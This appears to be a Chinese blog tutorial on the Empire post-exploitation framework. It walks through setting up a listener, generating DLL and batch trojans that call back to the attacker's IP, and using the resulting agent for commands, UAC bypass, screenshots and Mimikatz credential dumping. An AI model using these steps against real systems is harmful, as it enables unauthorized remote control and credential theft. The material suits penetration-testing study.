初识域渗透利器Empire

初识域渗透利器Empire

 

Empire 是一款类似Metasploit 的渗透测试框架,基于python 编写,Empire是一个纯粹的PowerShell 后开发代理,建立在密码安全通信和灵活的架构上。Empire 实现了无需powershell.exe 即可运行PowerShell 代理的功能,从键盘记录器到Mimikatz 等快速部署的后期开发模块,以及适应性通信以避开网络检测,所有这些都包含在以可用性为重点的框架中。

 

 

 

 

0x01 首先是下载、安装

 

Github:https://github.com/EmpireProject/Empire

不喜欢用命令的同学可以去安装一个GUI界面的,也是国外大牛用php写的一个web界面

Github:https://github.com/interference-security/empire-web

下载

初识域渗透利器Empire_第1张图片

 

安装

 

 

 打开Empire

 

初识域渗透利器Empire_第2张图片

 

 

 

 

 

 

 

0x02 基本使用

 

help命令查看具体帮助

初识域渗透利器Empire_第3张图片

 

Agents—— 未来回连的靶机;

creds—— 便是数据库中写入的各类凭据(主要为口令一类);

interacrt——与现有agents宝宝们交互(实际并非一个交互性shell,Empire其实类似一款http/https仿造浏览器请求侦察与控守混合型木马,通道隐藏性较好可惜牺牲了流量,wireshark抓包你会发现核心防火墙上的request包流浪有多么恐怖~);

list—— 后跟listeners或agents列出当前活跃的监听器或服务端宝宝;

listeners—— 进入监听器设置接口;

load—— 加载自定义模块或其他扩展模块接口(默认为empire当前目录);

plugin—— 加载自定义插件或其他扩展插件;

 plugins—— 列出所有载入的插件列表; 

preobfuscate——预混淆功能。食之无味,弃之可惜,谓之鸡肋。还是介绍一下,需要在系统上预装wine和powershell,但是wine本身的不稳定,笔者也不知道怎么去描述这个功能的设计目的了。预混淆顾名思义就是预先对所有加入了该功能接口的脚本执行混淆操作,增强其后渗透阶段免杀能力,不过,笔者表示懒得去用;

reload—— 同MSFreload功能;

report—— 输出报告;

reset—— 重置ip黑白名单、混淆项目等;

resource—— 批量导入empire命令执行;

searchmodule—— 模块关键词搜索(命令行界面优于GUI界面);

set—— 设置ip黑白名单、混淆项目等;

show—— 查看当前框架设置,也就是set默认值;

usemodule—— 使用某一模块;

usestager—— 使用某一载荷。

 

 

 

Listeners

首先你要建立一个本地的Listener,listeners命令将跳到listener管理菜单。你可以随时使用list命令列出被激活的listener。Info命令将显示当前listener配置的选项。

 

 

 

 

listener之后空格加敲2下TAB列出可供使用的监听器,然后基于我们的需求选择所需要配置的监听器:

这里我们首先选择http,每个监听器具体功能可进入该监听器模块而后info显示进行阅读。

初识域渗透利器Empire_第4张图片

 

使用set命令设置Host/Port参数,可以直接使用域名。

(Empire: listeners/http) > set Name shuteer
(Empire: listeners/http) > set Host 192.168.190.141
(Empire: listeners/http) > execute

初识域渗透利器Empire_第5张图片

 

Back命令即可返回上一层 list命令可以列出当前激活的listener,kill命令可以删除该监听。

 

 初识域渗透利器Empire_第6张图片

 

 

 

 

 

 

 

 

 

 

 

0x03 生成木马

Stagers 

Empire在./lib/stagers/*里实现了多个模块化的stagers。包含有dlls,macros,one-liners等等。使用usestager 列出所有可用的stagers。

 

初识域渗透利器Empire_第7张图片

 

 

 multi模块为通用模块,osx是Mac操作系统的模块,剩下的就是windows的模块

 

 

1)DLL

dll 进程注入马应该是平日里用的最多的方式了,输入usestagerwindows/dll 的命令,然后输入info 命令来查看详细参数

(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info

 

初识域渗透利器Empire_第8张图片

 

 这里我们设置一下Listener,然后执行execute命令,就会在tmp目录下生成launcher.dll的木马

(Empire: stager/windows/dll) > set Listener shuteer
(Empire: stager/windows/dll) > execute

 

初识域渗透利器Empire_第9张图片

 

初识域渗透利器Empire_第10张图片

 

 

 

然后将launcher.dll在目标主机上运行后,就会成功上线。

注意:当然也可以用于NSA方程式工具当中的双重脉冲SMB后门,毕竟最开始Empire被广泛关注就是结合NSA后门程序反弹shell利用的Youtube视频。

 

 

 

2)launcher相关

如果只是需要简单的powershell代码,在设置完相应模块后,可以直接在监听器菜单中键入“launcher ”,自动生成一行base64编码后的PowerShell代码。

最后返回键入launcherpowershell My@Empire命令来生成一个Payload,放置到目标主机执行即可。

 

(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > info

 

 初识域渗透利器Empire_第11张图片

 

生成

 

(Empire: stager/windows/launcher_bat) > set Listener shuteer
(Empire: stager/windows/launcher_bat) > execute

[*] Stager output written out to: /tmp/launcher.bat

 

 

初识域渗透利器Empire_第12张图片

 

 

目标机执行

 

可以看到base64编码代码

 

初识域渗透利器Empire_第13张图片

 

 初识域渗透利器Empire_第14张图片

成功反弹监听会话,agents查看反弹的会话,和msf的sessions差不多

初识域渗透利器Empire_第15张图片

 

 

 

 

 

 

 

0X04 交互阶段

interact命令来进行交互

 

(Empire: agents) > interact NTGZWASR
(Empire: NTGZWASR) > whoami
[*] Tasked NTGZWASR to run TASK_SHELL
[*] Agent NTGZWASR tasked with task ID 1
(Empire: NTGZWASR) > [*] Agent NTGZWASR returned results.
PC-201807190112\Administrator

 

初识域渗透利器Empire_第16张图片

 

 help命令可以查看agent中可以使用哪些命令

初识域渗透利器Empire_第17张图片

 

Bypassuac命令

顾名思义就是绕过uac的。除非你是本机的administrator,否则普通管理员都需要右键某个程序,然后选择run as administrator才能运行,这都是uac作的怪。
因为这里是用普通域用户权限执行的,连本机的普通管理员都不算,所以失败了。

 

 

sc命令 屏幕截图

 

 

 

 初识域渗透利器Empire_第18张图片

 

 mimikatz命令 抓hash

初识域渗透利器Empire_第19张图片

 

 

upload download命令不用多说了

 

posted @ 2019-03-20 13:03 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(内网渗透,Web渗透,权限提升)